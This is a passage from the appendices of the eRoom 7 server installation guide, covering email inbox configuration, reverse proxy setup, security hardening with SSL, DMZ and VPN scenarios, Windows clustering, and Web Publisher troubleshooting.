interval at which the eRoom Scheduler checks for new mail delivered to the SMTP service.
The default setting checks every five minutes.
How do end users direct email to particular inboxes?
eRoom delivers mail to the inboxes based on their addresses. The Scheduler checks for mail
in the drop directory specified in the SMTP service (IIS Manager). For single-server sites,
mail is delivered to the appropriate inboxes. For multi-server sites, mail on servers other
than the one with the SMTP service is temporarily stored in the ~Mail Drop folder on the
main file server. When the Scheduler runs on other servers, it looks for mail in this folder
and directs it to the appropriate inboxes.
16 | eRoom 7 Server Installation and Configuration Guide
Appendix A: Configuring eRoom Inboxes
Conversion of Mail Messages to eRoom Inbox Pages
eRoom converts each email message sent to an inbox to an eRoom page as follows:
•
The subject line becomes the title of the page.
•
The page itself contains an email icon (
message.
•
File attachments are created as attachments to the new eRoom item. If eRoom cannot
determine the type of attachment (because it is using a non-standard MIME type),
eRoom creates a file attachment as a text file called “Attachment N.txt” where N is a
number greater than zero. Users can rename this file if they like.
) for replying to the sender and the text of the
HTML email messages:
The inbox feature supports HTML email messages. eRoom restricts the HTML content of
eRoom items so that they can be edited with our rich text editor. Incoming email messages
in HTML format will have all non-supported HTML stripped from them, including style
sheets, script (VBScript and JavaScript), and other non-standard tags. It is important to
note that all script is removed, which prevents potential security problems caused by
malicious script. Inline images are retained, and can be edited in the rich text editor.
eRoom 7 Server Installation and Configuration Guide | 17
Appendix B: Configuring a Reverse Proxy Server with eRoom 7
Appendix B: Configuring a Reverse Proxy Server with eRoom 7
Follow these steps to configure eRoom 7 with a reverse proxy (RP) server. This
configuration ensures that eRoom requests are properly redirected through the reverse
proxy to the eRoom web server. First you configure the reverse proxy, and then the eRoom
web server.
`
Important: Verify that the reverse proxy server you are using is fully supported to work
with eRoom Server 7. If you’re not sure, contact eRoom Technical Support.
For this example, assume that:
•
End users want to access eRoom by using eroom.company.com.
•
There are two servers, as follows:
Server
Description
Fully Qualified Domain Name
IP Address
app1
eRoom Server
app1.company.com
192.168.1.100
proxy
reverse proxy Server
proxy.company.com
192.168.1.99
Configure the Reverse Proxy Server
1. Configure the public DNS server to resolve eroom.company.com to the reverse proxy
server IP (192.168.1.99).
`
Note: In some configurations, two IP addresses might be required for the reverse proxy
server (one or two NIC cards)—one IP for external (Internet) use, and one for internal network use. In this configuration, DNS should resolve to the external (Internet) IP. TCP/IP settings can be set in Windows Control Panel / Network Settings. Consult with a qualified
network IT person to make sure the reverse proxy network settings are correctly configured
before testing with eRoom Server.
2. Configure the reverse proxy to redirect client requests to the eRoom Server:
3. Configure the reverse proxy server to redirect to the eRoom server, using its fully-qualified domain name.
Example From: https://proxy.company.com
To: https://app1.company.com
4. Test accessing the default home page (of the eRoom web server) from a client workstation. For testing purposes, the host file on a client workstation can be configured to
resolve eroom.company.com to the external IP of the reverse proxy (if you skipped step
1 for DNS setup).
5. Configure the RP to redirect all the /eRoomXXX virtual roots on the reverse proxy server
to forward to the eRoom server. These include
/eRoom
/eRoomASP
/eRoomData
18 | eRoom 7 Server Installation and Configuration Guide
Appendix B: Configuring a Reverse Proxy Server with eRoom 7
/eRoomExtpages
/eRoomHelp
/eRoomReq
/eRoomSetup
/eRoomXML
Example From: https://proxy.company.com/eRoomasp
To: https://app1.company.com/eRoomasp
`
Note: If you want to disable the reverse proxy server for users inside the firewall, you can
do so on the Edit eRoom Server dialog, accessible through the eRoom Server Administration
utility. (This requires that internal users can resolve the reverse proxy DNS name.)
Configure the eRoom Web Server
1. On the eRoom server, the fully qualified domain name eroom.company.com should be
mapped to the true eRoom server (192.168.1.100). You can do this by modifying the
HOSTS file with an entry that resolves eroom.company.com to 192.168.1.100 (the IP
of the eRoom server itself).
2. Choose Start > Programs > eRoom Administration > eRoom Server Administration to
Open the eRoom Server Administration utility.
3. Right-click on the eRoom server and choose “Edit Server”.
4. In the Full Servername field, enter the RP server name.
5. In the Reverse Proxy Server section, check the “This eRoom server is being used through
a reverse proxy server” checkbox.
6. Specify any other Reverse Proxy Section settings as necessary.
Notes
On overriding the eRoom web server name in eRoom Server Settings
•
When the eRoom server name is overridden, eRoom responds to requests to app1.company.com with its own HTTP redirects (response code 301) to the server name specified
in eRoom Server Settings. The preceding procedure (Configure the eRoom Web Server)
allows you to override the eRoom server name and ensure that eroom.company.com
resolves to the true eRoom server (instead of redirecting and resolving back to the
reverse proxy in a loop).
•
The override web server name set in eRoom Server Settings must also be used to ensure
that URLs in eRoom email notifications and invites/alerts are sent out using the public
name eroom.company.com rather than the internal eRoom server name app1.company.com. This allows end users to click the link in eRoom emails and resolve to the
reverse proxy (as long as DNS is correctly set up).
•
When accessing eRoom from a browser on the eRoom server itself, eroom.company.com
will resolve locally to the eRoom server (vs. back to the RP). IIS will also likely respond
to app1.company.com or localhost or to its own IP address (192.168.1.100). However,
access to the web server using the true name or IP address of the eRoom server is likely
to be unpublicized, and restricted by firewalls.
eRoom 7 Server Installation and Configuration Guide | 19
Appendix B: Configuring a Reverse Proxy Server with eRoom 7
On securing the configuration
•
When securing both the eRoom and proxy servers, use proper care and testing to ensure
that the security does not impair functionality of either application.
•
SSL can be installed on the reverse proxy to ensure a secure connection with client
workstations. This means clients would use “https://” instead of “http://”.
•
SSL can also be installed on the eRoom web server to ensure a secure connection
between the RP and the eRoom server. However, some proxy servers may not be able to
redirect to a web server with “https://”.
•
In eRoom 7, an SSL certificate must be installed on the eRoom web server for eRoom to
recognize “https://” instead of “http://”. eRoom automatically recognizes that the SSL
certificate is installed and required. After applying the SSL certificate to the eRoom
server, you need to ensure that users use SSL (users cannot have the choice of whether
or not to use https:// in the URL address). Otherwise, the URL addresses in the notifications, alerts, and invitations will be incorrect. For instructions on how to force the use
of SSL for connected users, refer to the Documentum Support Notes on the Documentum
Support site for additional information.
•
If an SSL certificate cannot be installed on the eRoom web server, an alias might be created so that “http://” requests get translated to “https://” automatically.
20 | eRoom 7 Server Installation and Configuration Guide
Appendix C: eRoom Security Guidelines
Appendix C: eRoom Security Guidelines
eRoom Server Operating System Hardening
Properly configured and maintained, with appropriate security patches, Microsoft’s IIS is a
robust platform that can substantially reduce the risks inherent in running Internetaccessible applications. The most critical issue to consider for network applications like
eRoom 7 is the availability of remote services. Access to all services must be restricted to
those necessary for the server to function. This is typically done at two levels: network and
host.
At the network level, we strongly recommend using firewalls and routers to restrict access
to services (ports). At the host level, NT-based customers can use TCP/IP filtering to limit
exposure of unnecessary services. Win 2000-based customers can use IPSec filters to
perform this task more efficiently, because they can be applied on the fly, and they
correctly block ICMP.
It is especially important that you either block or disable access to such standard Windows
services as NetBIOS/SMB resource sharing. Attackers may perform known techniques to
reveal the names of system accounts and perform password-guessing attacks via these
services.
eRoom Security
By default, eRoom provides password-protected entry into eRooms and can synchronize
usernames and passwords through NT/Win2000 Domains or LDAP.
How does the eRoom server recognize a legitimate eRoom client?
Before granting access to information, eRoom asks users to log into the specified eRoom
with a username and a self-selected password.
Once the eRoom server authenticates the user, it generates a random session ID that serves
as a secure key for the duration of the session. This session ID makes the server resistant to
any unauthorized capture, alteration, and retransmission of a communication stream. To
properly log out from eRoom and destroy this session ID, users must exit the browser.
When logging into the eRoom Server via the browser, users can check "Save password" on
the Login dialog box, and eRoom saves the password in an encrypted form. The password is
vulnerable to reuse, however, if it is stolen and copied to another machine. For added
security, the eRoom administrator can disable the save password option.
On the server side, the eRoom server does not store passwords for users that come from a
Windows NT/2000 domain, Active Directory, or LDAP directory. The passwords of other
users are stored on the eRoom server and encrypted using MD5 hashing.
The server can also be configured to record failed login attempts. External directories can
be configured with account lockout rules, for example, to disable an account after multiple
failed login attempts. These rules will be effective with eRoom authentication for accounts
coming from such directories.
eRoom 7 Server Installation and Configuration Guide | 21
Appendix C: eRoom Security Guidelines
On the client side, eRoom access is provided by means of a browser. The browser can be
augmented with plug-in components. The plug-in enhanced browser uses a Microsoft ActiveX
control for its main functionality. The control, ERAdddin.OCX, is programmatically marked “safe for
scripting” and thus avoids a security check that validates the code’s authenticity (i.e. that the
identity of the control’s author can be verified by a trusted third party).
Since safe-for-scripting controls have been exploited within other software products to perform
unauthorized actions on end-user systems, eRoom implements a mechanism whereby trusted
servers are tracked and the control is not accessible except by those servers on the trusted list. In
addition, eRoom provides an alternative for customers who wish to avoid using ActiveX technology
entirely--they can use the thin client (a server-side configuration parameter can force all users to
connect with the thin client only).
Although eRoom has taken steps to obfuscate user credentials stored on the rich client system, we
cannot guarantee that a dedicated, resourceful attacker could not obtain this information given
enough time. Thus, client environments should also be well protected through policy and physical
security mechanisms.
How is access to eRoom information controlled?
Access control is available from the facility level down to each individual object in an eRoom.
eRoom member lists define who can access each eRoom and facility on the server and access
control lists manage access to all eRoom objects.
Access control is fully implemented at the server. That means that even in the unlikely event that
the client code is compromised, or if the server is being “spoofed,” the server continues to enforce
access limitations. The server has no implicit trust of client-side code; it performs authentication
and authorization checks based solely on credentials provided by the client, such as name and
password.
Using eRoom within an Internal Network
eRoom uses standard HTTP for all its communications, in both directions. Consequently, if your
systems and firewalls are configured so that a specific person can use a web browser to access a
certain web server, then the user will also be able to access an eRoom running on that server.
22 | eRoom 7 Server Installation and Configuration Guide
Appendix C: eRoom Security Guidelines
Access to the eRoom server via the browser uses JavaScript to perform some actions. In
addition, the eRoom “rich client” uses plug-in components to provide additional services to
the user. Consequently, it is important that the browser and firewall configurations do not
block either of these. If the firewall allows no applications, you need to specify that the
following applications be allowed to pass through the firewall: application/Octetstream.
Using eRoom in the Extended Enterprise
Many current eRoom customers use their eRooms with employees, suppliers, clients, and
partners that are not part of their internal network. They require a security solution that
enables continuous remote access to the eRoom application. The following sample
scenarios present common configurations that customers use and the security technologies
that they require.
Scenario 1: eRoom on the extranet
Many eRoom customers put their eRoom server on the extranet. Installing eRoom on a web
server outside the firewall means that securing, or “hardening”, the server becomes very
important. The most important thing you can do to ensure the security of such a
configuration is to ensure that the only ports enabled on the Windows NT or Windows 2000
Server are those necessary for the required services. Such services include either of the
following:
•
HTTP (port 80)
•
HTTPS (port 443)
Depending on your company’s needs, you might also make one or more of the following
accessible through the firewall:
•
SMTP (port 25)
•
POP3 (port 110)
•
SQL 7 (port 1433)
Make sure that no File Services, FTP, or similar services are enabled.
This configuration provides three levels of defense:
•
Windows NT and Windows 2000 Server's security to protect access to all resources
•
Microsoft IIS Web Server for security
•
eRoom software to protect access
In addition to hardening the server, eRoom recommends using SSL and digital certificates to
protect information during transmission in the extranet environment.
About Secure Sockets Layer (SSL)
SSL is a protocol designed to provide security during the transmission of sensitive data over
TCP/IP. SSL provides data encryption, server authentication, and message integrity for data
transmission over the Internet. SSL can provide a secure transport layer for communications
with your eRoom Server.
eRoom 7 Server Installation and Configuration Guide | 23
Appendix C: eRoom Security Guidelines
Since some forms of eRoom authentication are based on protocols that send Base64encoded passwords, an authentication session can be captured and analyzed using
eavesdropping tools. The risk of an attacker being situated properly on the public Internet
in a position to eavesdrop on such traffic is low. Nevertheless, the risk is present, and may
be greater for large organizations with multiple network segments between eRoom servers
and clients. eRoom Server Administrators should be aware of the risks involved in using
eRoom “out-of-the-box” without SSL configured. We recommend using SSL.
About digital certificates
Digital certificates are available for both the server and the client. A server-side digital
certificate is analogous to an ID card for the server. Verified by a third-party certificate
authority, a digital certificate is a complete set of information about its owner, based on an
Internet standard.
What are the advantages of using digital certificates?
Together with SSL, digital certificates secure communications on the Web by providing the
following:
•
Authentication. When a server has a Digital ID, all client browsers know that they are
dealing with a legitimate source. The client can then verify the identity of the server
before accepting the public key to begin the SSL session.
•
Message privacy. All traffic between the server and browser is encrypted using a unique
"session key." Each session key is used with only one customer during one connection,
and that key is itself encrypted with the server’s public key. These layers of privacy protection guarantee that information cannot be intercepted or viewed by unauthorized
parties. (Note: Encryption is provided in both directions even if only the server has a
Digital ID.)
•
Message integrity. The contents of all communications between the server and the
browser are protected from being altered en route. Each element of that transmission
knows that what it receives is exactly what was sent from the other side.
Using a recognized certificate is the easiest and most reliable way to enable SSL. eRoom
and the Internet Server Access API will work correctly with SSL and Digital Certificates
when using either Microsoft Internet Explorer or Netscape Navigator.
When communication with the server is encrypted with SSL, login information is securely
delivered to the server, which then authenticates the user's name and password. This
ensures that the eRoom client cannot be spoofed into revealing a username and password
pair. All communication is then encrypted for the life of the user’s session. eRoom supports
all versions of SSL technology, though SSL v3 or higher is recommended due to the
cryptographic enhancements contained in this version.
Scenario 2: Using eRoom within a DMZ
A DMZ is a firewall-protected network space that allows limited access to web-based
services by outside parties. Although DMZs are widely used within corporate IT
organizations to protect public web servers, they are increasingly required for business-tobusiness activities, including transaction-based applications and collaboration tools such as
eRoom.
24 | eRoom 7 Server Installation and Configuration Guide
Appendix C: eRoom Security Guidelines
There are many possible variations of the DMZ, but the basic concept is that external users
are allowed access on a limited number of ports (often just the SSL port) to hosts on the
DMZ subnet. There is essentially an “external firewall” that does packet-level filtering to
allow specific access by port to hosts in the DMZ and then there is an “internal firewall”
that prevents any access to internal hosts.
DMZ
At this most basic level, barriers to entry for external users are low. The security risk is
“contained” in the DMZ and can be further reduced by requiring all SSL-connections and
disabling all other ports.
As mentioned previously, each company needs to decide whether or not to open up the
internal firewall for specific services, such as SMTP mail access or SQL Server database.
DMZ
Scenario 3: Using eRoom with a Proxy Server
The next level of security is usually implemented by requiring a stronger authentication
process through a proxy server.
Proxy servers act as mediators for all communication between the user on the internal
corporate network and a service on the Internet. Proxy servers can improve security by
performing more intelligent filtering – that is, they are more capable of filtering HTTP by
content type (for example, to remove Java or JavaScript) and better at virus detection
than package filtering systems. Because of their positioning between a client and the
Internet, proxy systems also generate new IP packets for the client, thus protecting clients
from malformed IP packets.
eRoom 7 Server Installation and Configuration Guide | 25
Appendix C: eRoom Security Guidelines
A more secure version of this configuration is the reverse proxy server. In this scenario,
eRoom resides within a protected segment of the network with the reverse proxy in the
DMZ. External users’ requests are captured by the reverse proxy server and forwarded to
the eRoom server. The reverse proxy server adds an additional level of security by hiding
the eRoom servers’ true network address as well as by applying application layer rules.
Scenario 4: Using eRoom with a two-tiered authentication system
The most secure environments require the use of a two-tiered authentication system such
as SmartCards or RSA SecurID. These technologies require two forms of authentication,
based on something the user knows, such as a PIN number, and something the user has, a
physical authenticator. Both are required to access the network. This level of access is
available when using browser access with or without the optional plug-in, although there
may be some limitations to the plug-in functionality.
Scenario 5: Using eRoom with a single sign-on (SSO) system
Single sign-on (SSO) systems combine ease-of-use and security. An SSO solution, such as
Netegrity SiteMinder, performs user authentication and often combines it with entitlement
management. In such a situation, a user logs into the system only once, and then has
enterprise-wide access to all authorized resources. The SSO system enforces access policies
as well. Both with and without the optional plug-in, eRoom supports Netegrity SiteMinder,
although there may be some limitations to the plug-in functionality. Netegrity integration
requires a Documentum Consulting engagement.
26 | eRoom 7 Server Installation and Configuration Guide
Appendix C: eRoom Security Guidelines
Scenario 6: Using eRoom in a Virtual Private Network (VPN)
Clients can access eRoom servers using Virtual Private Networks (VPNs). Server information
and user data is encrypted, protecting clients from unauthorized access. VPN can be used
over phone lines or over the Internet. This allows corporations hosting eRoom to expand
access to the server without incurring large IT costs. The ISP is used to establish an
encrypted tunnel. The tunnel creates a secure connection between the user and the
enterprise customer's network over the Internet and is indistinguishable from a point-topoint connection.
DMZ
eRoom 7 Server Installation and Configuration Guide | 27
Appendix E: Clustering Environment Setup
Appendix E: Clustering Environment Setup
Before You Begin
Installing eRoom in a Clustered Environment involves the following:
•
Hardware configuration
•
Operating System, Network, and Disk Setup (on each node)
•
Microsoft Windows Cluster Service installation
•
eRoom installation
This document complements Microsoft’s Step by Step Guide to Installing Cluster Service.
Please download it from Microsoft’s web site and use it for your eRoom cluster setup.
Clustering Overview
How clustering works
The main benefit of configuring eRoom in a cluster is to minimize application downtime (by
eliminating human intervention in the case of a hardware, operating system, or application
problem). Both the eRoom web server and SQL server can be configured in a cluster. An
eRoom clustered environment consists of the following:
•
Cluster hardware platform. Cluster-aware hardware
•
Operating system. Windows 2000 Advanced Server. Microsoft Cluster Service. Microsoft
Internet Information Server 5 (IIS 5).
•
Database server. Microsoft SQL Server 2000 (separate from the web server). While
Internet Information Server (IIS) and the eRoom application must run on the same cluster, eRoom recommends that you run the Microsoft SQL Server database on a separate
cluster or server. This configuration improves system performance, robustness, and scalability; distributes possible failure points; and provides faster failover/recovery times.
•
Shared disk. Shared disk storage external to the eRoom Server is required for clustered
environments. While the goal of a clustered environment is to provide high availability,
by no means should it be viewed as the only backup to production. This means that the
cluster should include Disk Arrays and be backed up daily to provide data recovery in
worst-case situations.
•
eRoom application. The eRoom 7 application installation for Microsoft SQL Server.
A two-cluster node consists of two physical servers -- one server is the primary node and
the second server is the secondary node. In an Active/Passive cluster, the primary node is
the server that actively responds to client requests, while the passive node sits quietly
awaiting a failover. Both the eRoom web server and SQL servers will run as a primary node.
Should the primary node fail, then the secondary node takes over. When you build a twonode cluster using Windows 2000 Advanced Server and Microsoft Clustering Service, each
node must be connected to a shared disk array using either SCSI cables or fibre channel.
28 | eRoom 7 Server Installation and Configuration Guide
Appendix E: Clustering Environment Setup
Typically, this shared disk array is a standalone unit that houses a RAID 5 or RAID 10 disk
array. All of the shared data in the cluster must be stored on this disk array. Otherwise,
when a failover occurs, the secondary node in the cluster cannot access it. Keep in mind
that clustering does not help protect data or the shared disk array on which it is stored.
Therefore, make sure the shared disk array is very reliable and includes fault-tolerance.
In addition to connecting both servers to a shared disk array, both nodes of the cluster are
connected to each other via a private network. Each node uses this private network to
keep track of the status of the other node. For example, if the primary node experiences a
hardware failure, the secondary node detects this (via the private network) and
automatically initiates a failover.
How eRoom clients know what to do when a failover occurs
In a cluster configuration, you assign the web server its own virtual name and virtual IP
address (the SQL server also has its own unique virtual name and IP). Both web servers in
the cluster share the virtual name and address, and clients connect to the web cluster
using the virtual name. As far as a client is concerned, there is only one physical server, not
two. In an Active/Passive cluster design, the primary node responds to the client’s
requests.
eRoom 7 Server Installation and Configuration Guide | 29
Appendix E: Clustering Environment Setup
If the primary node fails to respond, a failover to the secondary node occurs, and the
cluster still retains the same virtual name and IP address (with a new physical server
responding to client requests). The failover period can last a few minutes. For the SQL
server, the exact amount of time depends on the number and sizes of the databases on SQL
Server, and how active they are). During this failover time (of either eRoom or the SQL
server), clients are be unable to access eRoom. Once a failover occurs, you must find out
what caused the failover, and then take the necessary action and correct the problem.
Requirements
Hardware requirements
`
•
Cluster aware hardware. For a list of Microsoft supported cluster hardware devices,
please refer to: http:www.microsoft.com/hcl
•
Two Network adapters for each node in the cluster (Five IP addresses are required after
the Operating System installation).
•
External Shared Storage Device and storage cables to attach shared storage device to all
computers.
•
Each node’s hardware should be identical for easier configuration and compatibility.
Note: At all times, refer to your vendor’s documentation regarding cluster hardware connections an disk configuration.
Hardware configuration requirements
The following are general hardware configuration steps that may apply in any cluster
setup:
•
With each node and the storage device powered off, ensure that each node is connected
to the shared storage device properly.
•
Power on the shared storage device only and ensure that the shared storage is set to
‘cluster mode’. This may be a switch on the shared storage device itself to enable ‘cluster mode’.
•
Power on each node separately and ensure that the SCSI cards are configured correctly.
Again, check your vendor’s documentation regarding SCSI card configuration. Refer to
the Appendix of the Microsoft Step by Step Guide for information on Cluster SCSI connections.
By default, some SCSI cards may be in cluster mode but ‘disabled’. Ensure that each
SCSI card is cluster enabled.
Each SCSI card (on each node) must have a unique initiator ID (a different number for
each card on each node). For example, if the initiator ID is set to 7 on node 1, then set
the initiator id to 6 on node 2.
Typically, you can configure the SCSI cards during a boot of an individual node and by
pressing a particular hotkey (such as ‘ctrl-M’) during SCSI card initiation. Refer to vendor
documentation.
30 | eRoom 7 Server Installation and Configuration Guide
Appendix E: Clustering Environment Setup
•
Refer to hardware vendor’s documentation to assign the Shared Storage drives to an
array and to assign the level of RAID to be used. For example:
Local system drives = RAID 1 (mirrored)
Shared storage device = RAID 5
Operating System, Network, and Disk Installation
Requirements
•
Windows 2000 Advanced Server Operating System -- must be installed on both nodes.
•
Name resolution method (such as DNS).
•
All disks on each node should be formatted as NTFS.
•
Each node should belong to the same domain.
•
Each node should have its own server name.
•
Domain User account for the Cluster Service.
•
A total of five IP addresses required.
For the operating system, network, and disk installation, please reference Microsoft’s Stepby-Step Guide to Installing Cluster Service. Be sure to reference the “Power Sequencing”
chart within this guide to find out when each node (or the storage) should be powered on
or off. This document can be found at:
http://www.microsoft.com/windows2000/techinfo/planning/server/clustersteps.asp
There are no special considerations relating to eRoom 7 for SQL Server setup.
Installing Microsoft’s Cluster Service
Use the instructions in this section as a supplement to the instructions in Microsoft’s Stepby-Step Guide to Installing Cluster Service. The instructions in this section contain
essential information on how to install Microsoft’s Cluster service so that it will work with
eRoom 7 Clustering.
Operating system installation – Install Windows 2000 Advanced Server on each node.
Network setup – Once each operating system is installed on each node, set up the Network.
Each cluster node requires at least two network adapters -- one adapter connected to a
public network and one connected to a private network consisting of cluster nodes only. A
total of five IP addresses are used. Verify connectivity and create the domain account used
for the cluster service.
Disk setup – Using Windows Disk Management Utilities, ensure disks are formatted as NTFS
and are designated as Basic. Create the drive partitions and assign drive letters. When
configuring your drive partitions, be sure to set up the Quorum disk partition on a RAID
array prior to configuring the cluster services (recommended 500mb for the Quorum disk).
Cluster service setup – Set up and validate the Cluster Service on both nodes per the
Microsoft instructions. See the special notes in the next section.
eRoom 7 Server Installation and Configuration Guide | 31
Appendix E: Clustering Environment Setup
Cluster Service Setup
eRoom currently supports only Active/Passive clustering for the eRoom web and database
servers. The setup of the Cluster Service is the last step prior to installing the eRoom
software. Please reference the Microsoft Step by Step Guide for detailed steps on setting
up Microsoft’s cluster service. When you finish installing the cluster service, continue
following the Microsoft Guide steps to validate the setup on Node 1 and continue with the
Node 2 setup. Be sure to test the failover by moving the “Cluster Group” to the passive
node.
`
Note: In steps 9 to 11 of the Microsoft procedure, we recommend that you leave the default
name for the new cluster as “Cluster Group.” If you want to change this name, it is best to
do so after installing the eRoom software. Refer to eRoom technote 729 for additional information.
Cluster Group
32 | eRoom 7 Server Installation and Configuration Guide
Appendix E: Clustering Environment Setup
eRoom Software Installation
Pre-eRoom software installation checklist
•
The cluster hardware is set up, configured, and validated.
•
The operating system, network, and disks are set up, configured, and validated.
•
The cluster service is installed and running and a successful failover of the cluster group
has been tested.
•
A cluster group is created with the appropriate resources, including the cluster name, IP
address, and shared disk resources.
•
Microsoft SQL Server 2000 (recommended on a separate server) is properly configured
and ready for the eRoom installation. Both nodes must have access to the SQL Server.
•
Microsoft SQL Server Client Network Utility and admin tools are installed on both nodes
prior to the eRoom installation.
•
No cluster resources (for example, the IIS Resource) need to be created on the eRoom
web servers within the Cluster Service Administrator. eRoom will install its own resource
dll (ercluster.dll) to the %systemroot%\cluster on each web server node. The eRoom
resource is installed with no special dependencies on other cluster resources.
•
The IIS Services are often configured to run iisreset.exe on failure. Disable this through
the Microsoft Windows Services console.
•
Domain IUSR anonymous web user account setup is used on both nodes.
While not required, eRoom recommends deleting the default web site within IIS (unless
other applications must use it). Create a new web site and assign the new web site the
virtual IP address of the cluster. The home directory path of the new web site should point
to a new home directory (similar to the inetpub\wwwroot directory) on the shared storage
device. Assign the domain IUSR account to the new web site properties within the Internet
Service Manager. In addition, grant read rights to the new NTFS directory for the domain
IUSR account.
Overview of the eRoom installation in a clustered environment
1. Follow any pre-installation instructions according to the section Pre-installation
Requirements, on page 1 in this manaual.
2. Before installing eRoom, create a cluster group containing the shared disk resources,
and verify the Cluster Service is running prior to installing eRoom and a Cluster Group is
created containing the shared disk resources.
3. Install eRoom on the first node.
Ensure that node 1 is the active node.
When prompted during the install, place all eRoom program files and data on a logical
drive on the shared storage drive. Do not place eRoom or IIS files on the Quorum drive/
partition.
Since eRoom is not completely installed until it is installed on both nodes, you don’t
create the initial facility until the second node is installed.
eRoom 7 Server Installation and Configuration Guide | 33
Appendix E: Clustering Environment Setup
4. Install eRoom on the second node:
Move the cluster group from the first node to the second node.
Install eRoom on node 2 again.
You will not be prompted for the location of eRoom files, since you already entered
information during the first node install.
The eRoom install now creates a facility with an initial set of eRooms.
Once the eRoom installation is complete, you can move the cluster group back to the
first node.
5. Ensure that IIS and eRoom services are started.
6. Verify the web site eRoom is installed on is started (within IIS Admin console).
Applying eRoom Maintenance Releases to the Cluster Environment
1. Install eRoom 7.x on the active node 1.
2. Move the cluster group to node 2 and install the eRoom maintenance release there as
well.
3. Move the cluster group back to node 1.
`
Note: The eRoom install needs access to the shared storage and must be applied to the
active node. Keep in mind that the eRoom program files and data are on the shared storage.
Adding a Failed Web or Database Cluster Node Back to the Cluster
Adding an eRoom web server back to the cluster
1. Rebuild the failed node. This includes the hardware, operating system, and service/
security packs.
2. Install SQL 2000 Client network utility and reboot.
3. Run the cluster service setup and add the failed node back to the existing eRoom cluster.
4. Copy the c:\winnt\cluster\ercluster.dll to the failed node in the same directory path.
5. Run the following from a command line to synchronize the active node IIS configuration
to the passive node. Navigate to the c:\winnt\system32\inetsrv\ directory. Run: iissync
firstnode secondnode (where firstnode and secondnode are the server names of each
node).
6. Move the cluster group to the newly rebuilt node.
7. Remove the eRoom Resource listed within the Cluster Administrator UI. (Note: the
resource type will still exist. You are only deleting the eRoom Resource via the UI).
8. Install eRoom Application on the newly rebuilt node. (This install should pick up the
directory locations automatically and “convert” existing facilities).
9. Test eRoom access, creating facilities, and failover.
34 | eRoom 7 Server Installation and Configuration Guide
Appendix E: Clustering Environment Setup
Adding a Microsoft SQL Server 2000 back to the cluster
Microsoft SQL Server Enterprise Edition installs SQL Server executables and program files on
both nodes. If the active node fails, you can find directions to rebuild the node and add it
back to the cluster within SQL Server Books Online (BOL). The basic process is as follows:
1. Run the Microsoft SQL Server setup program.
2. Remove the failed node from the configuration.
3. Repair the node.
4. Run Setup program again.
When you add that node back into the SQL Server 2000 configuration, SQL Server reinstalls
and reconfigures itself appropriately.
Additional Resources
Microsoft Support Policy for Server Clusters (includes: SANs and Geographically Dispersed
Clusters)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q309395
Microsoft: Step by Step Guide to Installing Cluster Service
http://www.microsoft.com/windows2000/techinfo/planning/server/clustersteps.asp
Microsoft: How to Install Services Packs in a Cluster
http://support.microsoft.com/defaut.aspx?scid=kb;en-us;Q174799
Microsoft: Clustering FAQ
http://www.microsoft.com/NTServer/Support/faqs/clustering_faq.asp
SQL Server 2000 Failover Clustering FAQ
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q260758
Installation Order for SQL Server 2000 Enterprise Edition on Microsoft Cluster Server
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q243218
Recommended Private Heartbeat Configuration on a Cluster Server
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q258750
Also see SQL Server Online Books for more information on SQL Server Clustering.
eRoom 7 Server Installation and Configuration Guide | 35
Appendix F: Troubleshooting Problems with Web Publisher
Appendix F: Troubleshooting Problems with Web Publisher
Problem
Troubleshooting Steps
When attempting to import a file from
Content Server into eRoom, Web Publisher
files and folders fail to appear.
Verify that you have correctly installed
eRoom Version 7.0.2. Versions prior to 7.0.2
do not display Web Publisher files and folders.
When attempting to check out a Web
Publisher file from eRoom, you receive the
error, “Web Publisher is not installed on the
eRoom Server”.
Verify that Web Publisher has been installed
on the eRoom server. Note: Web Publisher
does not need to be running on the eRoom
server.
Verify that the Class Path system environment
variable contains the fully qualified path and
filename for wcm.jar (typically located in
...\program files\documentum\shared).
When attempting to check out a Web
Publisher file from eRoom, you receive the
error “The eRoom-to-WCM connector service
is not installed”.
Verify that there is a copy of the file
eroom.jar located in the eRoom 7 installation
directory (typically ...\program files\eRoom
Server 7).
Verify that the Class Path system environment
variable contains the fully qualified path and
filename for wcm.jar (typically located in
c:\program files\documentum\shared).
Verify that the Class Path system environment
variable contains the fully-qualified path and
filename for eroom.jar
When right-clicking on an eRoom item linked
to a Web Publisher file and choosing “Go to
Content Server...”, an error dialog appears
with an error similar to this: “JumpOperation:
failed to intialize form: InvokeMethod() failed
while calling: onInit This startupAction:search
is not properly defined. Cannot execute.
36 | eRoom 7 Server Installation and Configuration Guide
Verify that you have correctly completed the
instructions in this manual for setting up
eRoom Enterprise to work with Web
Publisher.
© 2011 - 2013 EMC Corporation. All Rights Reserved.
EMC believes the information in this publication is accurate as of its publication date. The information is subject to change
without
notice.
THE INFORMATION IN THIS PUBLICATION IS PROVIDED “AS IS.” EMC CORPORATION MAKES NO
REPRESENTATIONS OR
WARRANTIES OF ANY KIND WITH RESPECT TO THE INFORMATION IN THIS PUBLICATION, AND
SPECIFICALLY
DISCLAIMS IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
Use, copying, and distribution of any EMC software described in this publication requires an applicable software license.
EMC2, EMC, and the EMC logo are registered trademarks or trademarks of EMC Corporation in the United State and other
countries.
All other trademarks used herein are the property of their respective owners.